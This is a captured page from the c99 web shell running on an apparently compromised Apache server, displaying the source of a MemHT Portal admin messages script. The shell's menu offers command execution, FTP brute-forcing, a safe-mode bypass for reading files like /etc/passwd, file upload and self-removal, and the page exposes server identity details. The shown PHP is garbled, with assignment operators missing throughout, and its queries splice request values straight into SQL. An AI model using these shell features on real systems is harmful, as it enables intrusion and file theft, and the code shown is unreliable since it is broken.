!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/admin/pages/messages/   drwxr-xr-x
Free 40.63 GB of 127.8 GB (31.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (9.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/********************************************************************************
    - MemHT Portal -
    
    Copyright (C) 2007-2008 by Miltenovik Manojlo
    http://www.memht.com
    
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your opinion) any later version.
    
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.
    
    You should have received a copy of the GNU General Public License along
    with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)
    or write to the Free Software Foundation, Inc., 51 Franklin Street,
    Fifth Floor, Boston, MA02110-1301, USA.
        
********************************************************************************/

if (!defined("_LOAD_PAGE_")) {
    die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>");
}

if (isset($_GET['op'])) { $op inCode($_GET['op']); } else { $op ""; }
if (isset($_GET['id'])) { $id inCode($_GET['id']); } else { $id ""; }
if (isset($_GET['ok'])) { $ok inCode($_GET['ok']); } else { $ok false; }

if (isset($_POST['nome'])) { $nome inCode($_POST['nome']); } else { $nome false; }
if (isset($_POST['testo'])) { $testo inCode($_POST['testo']); } else { $testo false; }
if (isset($_POST['enabled'])) { $enabled inCode($_POST['enabled']); } else { $enabled ""; }
if (isset($_POST['rank'])) { $rank inCode($_POST['rank']); } else { $rank ""; }

if (isset($_GET['pg'])) { $pg inCode($_GET['pg']); } else { $pg 1; }
$ofsppg 20//Items per page
$ofsbgn = ($pg*$ofsppg)-$ofsppg;

function mexList($ofsbgn,$ofsppg,$pg) {
    global $dblink,$siteConfig;

    $n 0;
    echo "<table width='100%' align='center' cellspacing='1' cellpadding='0' class='std_nicetable'>";
    echo "<thead>\n";
    echo "<tr><td>"._TITLE_."</td><td width='15%'>"._AUTHOR_."</td><td width='15%'>"._DATE_."</td><td width='1%'>&nbsp;</td></tr>\n";
    echo "<t/head>\n";
    echo "<tbody>\n";
    if ($result $dblink->get_list("SELECT *,DATE_FORMAT(data, '".$siteConfig['timestamp']."') as data FROM memht_messaggi ORDER BY nome LIMIT $ofsbgn,$ofsppg")) {
        foreach ($result as $row) {
            $id intval($row['id']);
            $nome outCode($row['nome']);
            $testo outCode($row['testo']);
            $autore outCode($row['autore']);
            $data $row['data'];
            $enabled intval($row['enabled']);    
            
            $off = ($enabled!="1") ? "<img src='images/off.gif' alt='"._OFF_."' title='"._OFF_."'>" "" ;
            $class = (($n++%2)!=0) ? "hlight" "clean" ;
            
            echo "<tr><td class='$class'><b>$nome</b></td><td class='$class'>$autore</td><td class='$class'>$data</td><td class='$class' nowrap><a href='admin.php?page=messages&op=editMessage&id=$id' title='"._MODIFY_."'><img src='images/edit.gif' alt='Edit' border='0'></a> <a href='admin.php?page=messages&op=deleteMessage&id=$id' title='"._DELETE_."'><img src='images/delete.gif' alt='Delete' border='0'></a> $off</td></tr>\n";
        }
    } else {
        echo "<tr><td colspan='4' align='center' id='errorText' class='clean'><b>"._NOMESSAGES_."</b></td></tr>";
    }
    echo "</tbody>\n";
    echo "</table>";
    
    //Pages
    include_once("inc/class/paginationSystem.class.php");
    $ps = new paginationSystem();
    $ps->items $ofsppg;
    $ps->actpg $pg;
    $ps->query "SELECT id FROM memht_messaggi";
    $ps->url "admin.php?page=messages&op=showMessages&pg={{N}}";
    $ps->show();
}


function add($nome,$testo,$rank,$enabled,$ok=false) {
    global $dblink,$userInfo,$tzNOW;

    if (!$ok) {
        echo "<table width='100%' align='center' cellspacing='0' cellpadding='1'>";
        echo "<form name='form_mex' method='post' action='admin.php?page=messages&op=addMessage&ok=true'>";

            echo "<tr><td width='25%'><b>"._TITLE_."</b></td><td><input type='text' name='nome' size='40' maxlength='255'>\n";
            echo "<tr><td valign='top'><b>"._TEXT_."</b></td><td>";
                
                textarea("testo","100%","400px",1,"fulladmin");
                
                echo "</td></tr>\n";
            echo "<tr><td><b>"._REQUIREDRANK_."</b></td><td>";
            echo "<select name='rank'>\n";
                echo "<option value='0' selected>"._GUEST_."</option>\n";
                echo "<option value='1'>"._USER_."</option>\n";
                echo "<option value='2'>"._POWERUSER_."</option>\n";
                echo "<option value='3'>"._ADMIN_."</option>\n";
                echo "<option value='4'>"._SUPERADMIN_."</option>\n";
            echo "</select></td></tr>\n";
            echo "<tr><td><b>"._ENABLED_."</b></td><td>";
            echo "<select name='enabled'>\n";
                echo "<option value='1' selected>"._YES_."</option>\n";
                echo "<option value='0'>"._NO_."</option>\n";
            echo "</select></td></tr>\n";
            
            echo "<tr><td colspan='2'><input type='submit' name='Submit' value='"._ADD_."'></td>\n";
            
        echo "</form>\n";
        echo "</table>\n";
    } else {    
        $save true;
        if ($nome=="") { $save false$msg _TITLE_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        if ($testo=="") { $save false$msg _TEXT_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
    
        if ($save) {
            $dblink->query("INSERT INTO memht_messaggi (id,nome,testo,autore,data,rank,enabled)
                            VALUES (null,'$nome','$testo','".$userInfo['user']."',$tzNOW,'$rank','$enabled')");
            echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=messages'>";
        } else {
            echo "<div align='center' id='errorText'><b>$msg</b></div>";
        }
    }
}

function edit($id,$nome,$testo,$rank,$enabled,$ok=false) {
    global $dblink;
    $id intval($id);
    
    if (!$ok) {
        $row_edit $dblink->get_row("SELECT * FROM memht_messaggi WHERE id=$id");
        $mid intval($row_edit['id']);
        $mnome outCode($row_edit['nome']);
        $mtesto outCode($row_edit['testo']);
        $mrank intval($row_edit['rank']);    
        $menabled intval($row_edit['enabled']);
    
        echo "<table width='100%' align='center' cellspacing='0' cellpadding='1'>";
        echo "<form name='form_mex' method='post' action='admin.php?page=messages&op=editMessage&id=$mid&ok=true'>";
            echo "<tr><td width='25%'><b>"._TITLE_."</b></td><td><input type='text' name='nome' size='40' maxlength='255' value=\"$mnome\"></td>\n";
            echo "<tr><td valign='top'><b>"._TEXT_."</b></td><td>";
                
                textarea("testo","100%","400px",1,"fulladmin",$mtesto);
                
                echo "</td></tr>\n";
            echo "<tr><td><b>"._REQUIREDRANK_."</b></td><td>";
            echo "<select name='rank'>\n";
                $selected = ($mrank==0) ? " selected" "" ;
                echo "<option value='0'{$selected}>"._GUEST_."</option>\n";
                $selected = ($mrank==1) ? " selected" "" ;
                echo "<option value='1'{$selected}>"._USER_."</option>\n";
                $selected = ($mrank==2) ? " selected" "" ;
                echo "<option value='2'{$selected}>"._POWERUSER_."</option>\n";
                $selected = ($mrank==3) ? " selected" "" ;
                echo "<option value='3'{$selected}>"._ADMIN_."</option>\n";
                $selected = ($mrank==4) ? " selected" "" ;
                echo "<option value='4'{$selected}>"._SUPERADMIN_."</option>\n";
            echo "</select></td></tr>\n";
            echo "<tr><td><b>"._ENABLED_."</b></td><td>";
            echo "<select name='enabled'>\n";
                if ($menabled==1) {
                echo "<option value='1' selected>"._YES_."</option>\n";
                echo "<option value='0'>"._NO_."</option>\n";
            } else {
                echo "<option value='1'>"._YES_."</option>\n";
                echo "<option value='0' selected>"._NO_."</option>\n";
            }
            echo "</select></td>\n";
        echo "<tr><td colspan='2'><input type='submit' name='Submit' value='"._MODIFY_."'></td>\n";
        echo "</form>\n";
        echo "</table>\n";
    } else {    
        $save true;
        if ($nome=="") { $save false$msg _TITLE_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        if ($testo=="") { $save false$msg _TEXT_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
    
        if ($save) {
            $dblink->query("UPDATE memht_messaggi SET nome='$nome',testo='$testo',rank='$rank',enabled='$enabled' WHERE id='$id'");
            echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=messages'>";
        } else {
            echo "<div align='center' id='errorText'><b>$msg</b></div>";
        }
    }
}

function delete($id,$ok=false) {
    global $dblink;
    
    if ($ok) {
        $dblink->query("DELETE FROM memht_messaggi WHERE id='$id'");
        echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=messages'>";        
    } else {
        echo "<div align='center'><b>"._SUREDELETEMESSAGE_."</b><br><a href='admin.php?page=messages&op=deleteMessage&id=$id&ok=true' title='"._YES_."'>"._YES_."</a> - <a href='admin.php?page=messages' title='"._NO_."'>"._NO_."</a></div>";
    }
}

require_once("admin/inc/inc_header.php");
    admin_page_title($page);
                                
    openTable();
        echo "<div align='center' class='box'>";
            echo "<a href='admin.php?page=messages' title='"._LIST_."'><img src='admin/icons/messages.png' border='0' title='"._LIST_."' align='top'> "._LIST_."</a>";
            echo " - <a href='admin.php?page=messages&op=addMessage' title='"._ADD_."'><img src='admin/icons/add.png' border='0' title='"._ADD_."' align='top'> "._ADD_."</a>";
        echo "</div>";
    closeTable();
    
    openTable();
    
        switch($op) {
            case "addMessage":
                add($nome,$testo,$rank,$enabled,$ok);
            break;
            
            case "deleteMessage":
                delete($id,$ok);
            break;
            
            case "editMessage":
                edit($id,$nome,$testo,$rank,$enabled,$ok);
            break;
        
            case "showMessages":
            default:
                mexList($ofsbgn,$ofsppg,$pg);
            break;
        }
    
    closeTable();
require_once("admin/inc/inc_footer.php");

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0141 ]--